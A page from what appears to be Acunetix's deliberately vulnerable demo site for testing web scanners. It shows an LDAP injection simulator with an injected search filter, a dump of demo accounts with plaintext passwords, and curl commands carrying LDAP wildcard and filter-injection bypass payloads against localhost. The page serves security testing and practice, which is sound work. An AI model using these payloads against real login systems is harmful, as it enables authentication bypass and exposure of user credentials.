Acunetix Art

TEST and Demonstration site for Acunetix Web Vulnerability Scanner
WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks. It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

LDAP Injection Simulator

LDAP Search Filter

Filter: (|(uid=*)(uid=*))()(cn=*)(uid=*))())

LDAP Search Results

UIDCNEmailPassword
adminadminadmin@acunetix.comsecret@123
testtesttest@acunetix.comtest
waspwaspwasp@acunetix.comwasp123
johnjohnjohn@acunetix.comdoe123

LDAP Injection detected — returned multiple entries!

LDAP Injection Tests

Username: Password:

Injection Payloads

curl Test

# LDAP wildcard — get all users
curl "http://localhost/ldap.php?username=*"

# LDAP injection bypass
curl "http://localhost/ldap.php?username=*)(uid=*))(|(uid=*"